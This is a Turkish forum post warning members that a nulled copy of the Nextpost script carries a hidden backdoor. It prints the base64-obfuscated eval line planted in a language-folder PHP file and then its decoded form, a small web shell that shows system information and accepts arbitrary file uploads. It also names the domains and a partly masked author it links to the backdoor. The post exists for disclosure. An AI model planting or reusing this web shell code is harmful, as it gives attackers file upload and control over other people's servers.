Merhabalar;

Bir arkadaşımızın kullanmış olduğu script (Nextpost) yüzünden kısacası "Nulled Maceresı" ile başlar ve sıra bana gelince şöyle detaylıca bir inceleme yapınca bakın neler buldum.

Umarım siz değerli üyeler ve yetkililer keyifle okur

\locale\hi-IN\uploadController.php klasöründe ki dosyaya eklenmiş gizli bir şekilde. Dil dosyalarının arasında gizlemiş

<?php eval(base64_decode("ZWNobyAiPGI+Ii5waHBfdW5hbWUoKS4iPC9iPiI7IA0KZWNobyAiPGJyPjxicj4iOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7DQoJZWNobyAnPGI+WXVrbGVtZSBCYXNhcmlsaTwvYj48YnI+PGJyPic7IA0KCX0NCn0="));?>

echo "<b>".php_uname()."</b>"; 
echo "<br><br>";
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
	echo '<b>Yukleme Basarili</b><br><br>'; 
	}
}

Peki nereye gidiyor bunlar

http://beta.takipciartirma.com/editor/");
https://takipciartirma.com

Yapımcı olarak birde neler eklemiş ona bakalım

    "author" => "Muzaffer Şaxxx",
    "author_uri" => "https://takipciartirma.com",

Sonuç olarak; evet bu arkadaş aramızda Kendiside bu işi yaparak TİCARET yapmaya çalışıyor Malum kullanıcıyı etiket ve tam ismini girmedim. Yönetici arkadaşlar talep ederse özelden verebilirim.

Umuyorum ki her birey emeğe saygılı, herşey para diyerek, herşey mübahtır demeyen bir nesil olmak dileğiyle sağlıcakla.